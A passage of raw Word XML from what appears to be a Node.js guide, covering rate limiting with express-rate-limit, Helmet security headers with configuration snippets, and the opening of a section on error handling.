    <w:p w14:paraId="3DEB1F00" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Threshold Exceeded</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: If the number of requests exceeds the set limit, further requests are denied or throttled until the limit resets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00110BC2" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Feedback</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The server responds with an appropriate status code (e.g., HTTP 429 Too Many Requests) when the limit is exceeded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FCD344"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Implementing Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06419D9E" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Middleware</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In Node.js applications, you can use middleware like express-rate-limit for Express.js to implement rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F3D7C"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rateLimit = require('express-rate-limit');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E666AEE"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A20FEBB"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limiter = rateLimit({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED936B5"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windowMs: 15 * 60 * 1000, // 15 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E149160"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max: 100, // Limit each IP to 100 requests per windowMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6619DE9F"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message: 'Too many requests from this IP, please try again later.',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E764C"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38CF0BD"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0FC662A"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app.use(limiter);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE83B7D" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>API Gateways</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Rate limiting can also be configured at the API gateway level (e.g., AWS API Gateway, NGINX) to control traffic across multiple services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613F0945"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Helmet Package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A537442" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Helmet</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a middleware package for Express.js that helps secure your application by setting various HTTP headers. These headers protect against a range of common web vulnerabilities by enforcing best security practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FD9CB"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Key Features of Helmet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55734E6F" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Content Security Policy (CSP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4394E4BF"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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Content-Security-Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421846DB"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Prevents XSS attacks by specifying which dynamic resources are allowed to load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63736C7F"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helmet.contentSecurityPolicy({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E162EAF"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directives: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1409D4A8"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defaultSrc: ["'self'"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582FE5C8"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scriptSrc: ["'self'", "https://trusted.cdn.com"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408EFEB3"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8CDF916"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0D99597" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C781A"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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: X-Frame-Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA86AC4"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Prevents clickjacking attacks by controlling whether your site can be framed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A546CBF" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E"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helmet.frameguard({ action: 'deny' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DCAC3C" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-Content-Type-Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C85343"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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: X-Content-Type-Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F0689"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Prevents MIME type sniffing by instructing the browser to strictly follow the declared content type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42F6ED" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E"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helmet.noSniff();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D07C860" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Strict-Transport-Security (HSTS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9EE277"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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Strict-Transport-Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062D608"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Enforces HTTPS connections and helps prevent man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31996C08" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E"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helmet.hsts({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D23F3A" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E"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maxAge: 31536000, // 1 year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD0897C" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E"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includeSubDomains: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543725B9" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E"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2AF1594" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X-XSS-Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DBB3C4"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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: X-XSS-Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148C60B7"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Enables or disables cross-site scripting (XSS) protection in browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843161D" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E"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helmet.xssFilter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B421C4" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Referrer-Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09801DC5"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Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Referrer-Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1302BF93" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="560"/>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Controls how much referrer information is sent with requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E471F" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E"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helmet.referrerPolicy({ policy: 'no-referrer' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB6381" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using Helmet in an Express Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B50D46" w14:textId="77777777" w:rsidR="00C5072E" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To use Helmet, install it via npm and include it in your Express application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8994AD"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7C19739B"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helmet = require('helmet');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7774FB70"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DDEFAE3"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4E4BB267"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907EE63"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Use Helmet to set various security headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5051250E"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app.use(helmet());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540762CD"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A662EB6"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Your other middleware and routes here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1AC698"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741A431"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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C449FB9" w14:textId="77777777" w:rsidR="00C5072E"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console.log('Server is running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A5054" w14:textId="73AAF38E" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5072E"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r w:rsidR="00BB2F17" w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="051ABCF1" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc178383343"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAB8619" w14:textId="69905C42" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc178383344"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is error handling in Node.js and why is it important?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="288DE722" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error handling in Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the mechanisms and practices used to detect, manage, and respond to errors that occur during the execution of an application. Effective error handling is crucial for maintaining the stability, reliability, and security of an application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E8C80F" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Why Error Handling is Important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4FD6F2" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Proper error handling ensures that errors do not cause the entire application to crash, thereby maintaining the application's availability and stability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F5C02F" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User Experience</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Good error handling provides meaningful error messages to users and helps prevent application downtime, improving the overall user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDA7C61" w14:textId="77777777" w:rsidR="00FF08BD" w:rsidRPr="00DA2F32" w:rsidRDefault="00FF08BD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
